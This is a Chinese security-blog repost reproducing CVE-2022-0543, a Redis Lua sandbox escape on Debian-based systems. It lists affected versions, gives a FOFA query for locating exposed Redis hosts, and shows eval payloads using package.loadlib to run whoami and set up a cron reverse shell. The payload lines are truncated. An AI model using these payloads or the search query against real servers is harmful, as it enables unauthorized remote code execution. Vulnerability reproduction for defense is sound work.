!
也想出现在这里? 联系我们
创意广告

-CVE-2022-0543 Redis Lua沙盒绕过命令执行

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2022-0543 Redis Lua沙盒绕过命令执行

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

 Redis是一个广泛使用的缓存服务,但它也被用作消息代理。Redis嵌入了Lua编程语言作为其脚本引擎,可通过eval命令使用。Lua引擎应该是沙盒化的,即客户端可以与Lua中的RedisAPI交互,但不能在运行Redis的机器上执行任意代码。

    在Debian、Ubuntu或其他基于Debian的LinuxLinux发行版系统上,由于打包问题,Redis在Lua解析器初始化后,package变量没有被正确清除,能够执行任意Lua脚本的远程攻击者可以实现Lua沙盒逃逸并在主机上执行任意代码。

图片[1]--CVE-2022-0543 Redis Lua沙盒绕过命令执行-安全小天地

0x03 漏洞复现

漏洞影响:

Debian Redis(buster):5:5.0.14-1+deb10u2
Debian Redis(bullseye):5:6.0.16-1+deb11u2
Debian Redis(unstable):5:6.0.16-2
Ubuntu 21.10 Redis:5:6.0.15-1ubuntu0.1
Ubuntu 20.04 Redis:5:5.0.7-2ubuntu0.1

FOFA: app=”redis

1.执行whoami命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l()

2.执行计划任务反弹shell

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local 
图片[2]--CVE-2022-0543 Redis Lua沙盒绕过命令执行-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容